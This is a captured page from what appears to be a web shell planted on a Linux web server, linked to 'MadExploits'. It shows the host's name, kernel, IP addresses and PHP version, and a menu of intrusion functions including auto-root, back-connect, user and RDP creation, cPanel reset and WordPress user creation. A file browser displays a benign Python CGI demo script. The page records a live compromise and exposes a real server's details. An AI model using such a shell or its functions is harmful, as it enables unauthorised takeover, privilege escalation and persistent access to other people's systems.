Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.174.42
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
Demo /
cgi /
[ HOME SHELL ]
Name
Size
Permission
Action
README
437
B
-rw-r--r--
cgi0.sh
154
B
-rwxr-xr-x
cgi1.py
400
B
-rwxr-xr-x
cgi1.pyc
279
B
-rw-r--r--
cgi1.pyo
279
B
-rw-r--r--
cgi2.py
470
B
-rwxr-xr-x
cgi2.pyc
729
B
-rw-r--r--
cgi2.pyo
729
B
-rw-r--r--
cgi3.py
151
B
-rwxr-xr-x
cgi3.pyc
326
B
-rw-r--r--
cgi3.pyo
326
B
-rw-r--r--
wiki.py
3.94
KB
-rw-r--r--
wiki.pyc
5.25
KB
-rw-r--r--
wiki.pyo
5.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cgi1.py
#! /usr/bin/python2.7 """CGI test 1 - check server setup.""" # Until you get this to work, your web server isn't set up right or # your Python isn't set up right. # If cgi0.sh works but cgi1.py doesn't, check the #! line and the file # permissions. The docs for the cgi.py module have debugging tips. print "Content-type: text/html" print print "<h1>Hello world</h1>" print "<p>This is cgi1.py"
Close